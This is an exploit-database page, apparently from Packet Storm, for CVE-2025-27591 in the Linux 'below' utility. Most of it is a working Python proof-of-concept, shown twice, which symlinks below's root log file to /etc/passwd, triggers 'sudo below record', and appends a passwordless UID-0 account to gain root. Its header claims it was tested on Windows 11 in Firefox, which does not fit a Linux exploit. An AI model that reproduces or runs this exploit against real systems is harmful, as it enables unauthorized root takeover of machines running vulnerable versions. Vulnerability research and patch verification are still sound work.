📄 Below Symlink Privilege Escalation_PACKETSTORM:219373

6.8 / 10

MEDIUM

CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N

Description

This Python script demonstrates a potential privilege escalation technique related to CVE-2025-27591, leveraging symbolic link symlink manipulation in a logging directory used by the below utility. Versions prior to 0.9.0 are affected...

Visit Original Source

Basic Information

ID PACKETSTORM:219373

Published Apr 21, 2026 at 00:00

Affected Product

Affected Versions ==================================================================================================================================
| # Title : Below <v0.9.0 Symlink-Based Privilege Escalation via Log Manipulation |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/facebookincubator/below |
==================================================================================================================================

[+] Summary : This Python script demonstrates a potential privilege escalation technique related to CVE-2025-27591, leveraging symbolic link (symlink) manipulation in a logging directory used by the below utility.

[+] POC :

import os
import subprocess
import sys
from pathlib import Path

LOG_DIR = "/var/log/below"
LOG_FILE = os.path.join(LOG_DIR, "error_root.log")
TARGET_FILE = "/etc/passwd"
TMP_PAYLOAD = "/tmp/payload"
FAKE_USER_LINE = "nikolas-trey::0:0:nikolas-trey:/root:/bin/bash\n"

def main():
print("[*] CVE-2025-27591 exploit - Python Version")

try:
with open(TMP_PAYLOAD, 'w') as f:
f.write(FAKE_USER_LINE)
print(f"[+] Payload written to {TMP_PAYLOAD}")
except IOError as e:
print(f"[-] Failed to write payload: {e}")
return

if not os.path.isdir(LOG_DIR):
print(f"[-] Log directory {LOG_DIR} does not exist.")
return

if not os.access(LOG_DIR, os.W_OK):
print(f"[-] Log directory {LOG_DIR} is not writable.")
return

print(f"[+] {LOG_DIR} is writable.")

if os.path.lexists(LOG_FILE):
try:
os.remove(LOG_FILE)
print(f"[+] Removed existing file/symlink: {LOG_FILE}")
except OSError as e:
print(f"[-] Could not remove {LOG_FILE}: {e}")
return

try:
os.symlink(TARGET_FILE, LOG_FILE)
print(f"[+] Symlink created: {LOG_FILE} -> {TARGET_FILE}")
except OSError as e:
print(f"[-] Symlink creation failed: {e}")
return

print("[*] Triggering sudo log write via `below`...")
try:
subprocess.run(
["sudo", "/usr/bin/below", "record"],
timeout=5,
capture_output=True,
text=True
)
except subprocess.TimeoutExpired:
print("[*] 'below' command timed out (expected)")
except Exception as e:
print(f"[*] Note: execution error: {e}")

try:
with open(TMP_PAYLOAD, 'r') as p:
data = p.read()

with open(LOG_FILE, 'a') as target:
target.write(data)

print("[+] Payload appended successfully.")
except PermissionError:
print("[-] Permission Denied.")
except FileNotFoundError:
print("[-] Target file not found (symlink broken).")
except Exception as e:
print(f"[-] Unexpected error: {e}")

print("[*] Done.")

if __name__ == "__main__":
main()

Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================

{
    "lastseen": "2026-04-21T16:45:57",
    "description": "This Python script demonstrates a potential privilege escalation technique related to CVE-2025-27591, leveraging symbolic link symlink manipulation in a logging directory used by the below utility. Versions prior to 0.9.0 are affected...",
    "published": "2026-04-21T00:00:00",
    "modified": "2026-04-21T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Below Symlink Privilege Escalation",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:219373",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-27591"
    ],
    "sourceData": "==================================================================================================================================\n    | # Title     : Below <v0.9.0 Symlink-Based Privilege Escalation via Log Manipulation                                            |\n    | # Author    : indoushka                                                                                                        |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits)                                                 |\n    | # Vendor    : https://github.com/facebookincubator/below                                                                       |\n    ==================================================================================================================================\n    \n    [+] Summary    : This Python script demonstrates a potential privilege escalation technique related to CVE-2025-27591, leveraging symbolic link (symlink) manipulation in a logging directory used by the below utility.\n    \n    \n    [+] POC        :  \n    \n    import os\n    import subprocess\n    import sys\n    from pathlib import Path\n    \n    LOG_DIR = \"/var/log/below\"\n    LOG_FILE = os.path.join(LOG_DIR, \"error_root.log\")\n    TARGET_FILE = \"/etc/passwd\"\n    TMP_PAYLOAD = \"/tmp/payload\"\n    FAKE_USER_LINE = \"nikolas-trey::0:0:nikolas-trey:/root:/bin/bash\\n\"\n    \n    def main():\n        print(\"[*] CVE-2025-27591 exploit - Python Version\")\n    \n        try:\n            with open(TMP_PAYLOAD, 'w') as f:\n                f.write(FAKE_USER_LINE)\n            print(f\"[+] Payload written to {TMP_PAYLOAD}\")\n        except IOError as e:\n            print(f\"[-] Failed to write payload: {e}\")\n            return\n    \n        if not os.path.isdir(LOG_DIR):\n            print(f\"[-] Log directory {LOG_DIR} does not exist.\")\n            return\n    \n        if not os.access(LOG_DIR, os.W_OK):\n            print(f\"[-] Log directory {LOG_DIR} is not writable.\")\n            return\n    \n        print(f\"[+] {LOG_DIR} is writable.\")\n    \n        if os.path.lexists(LOG_FILE):  \n            try:\n                os.remove(LOG_FILE)\n                print(f\"[+] Removed existing file/symlink: {LOG_FILE}\")\n            except OSError as e:\n                print(f\"[-] Could not remove {LOG_FILE}: {e}\")\n                return\n    \n        try:\n            os.symlink(TARGET_FILE, LOG_FILE)\n            print(f\"[+] Symlink created: {LOG_FILE} -> {TARGET_FILE}\")\n        except OSError as e:\n            print(f\"[-] Symlink creation failed: {e}\")\n            return\n    \n        print(\"[*] Triggering sudo log write via `below`...\")\n        try:\n            subprocess.run(\n                [\"sudo\", \"/usr/bin/below\", \"record\"],\n                timeout=5,\n                capture_output=True,\n                text=True \n            )\n        except subprocess.TimeoutExpired:\n            print(\"[*] 'below' command timed out (expected)\")\n        except Exception as e:\n            print(f\"[*] Note: execution error: {e}\")\n    \n        try:\n            with open(TMP_PAYLOAD, 'r') as p:\n                data = p.read()\n    \n            with open(LOG_FILE, 'a') as target:\n                target.write(data)\n    \n            print(\"[+] Payload appended successfully.\")\n        except PermissionError:\n            print(\"[-] Permission Denied.\")\n        except FileNotFoundError:\n            print(\"[-] Target file not found (symlink broken).\")\n        except Exception as e:\n            print(f\"[-] Unexpected error: {e}\")\n    \n        print(\"[*] Done.\")\n    \n    if __name__ == \"__main__\":\n        main()\n    \t\n    Greetings to :==============================================================================\n    jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|\n    ============================================================================================",
    "sourceHref": "https://packetstorm.news/download/219373",
    "cvss": {
        "score": 6.8,
        "severity": "MEDIUM",
        "vector": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/219373/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply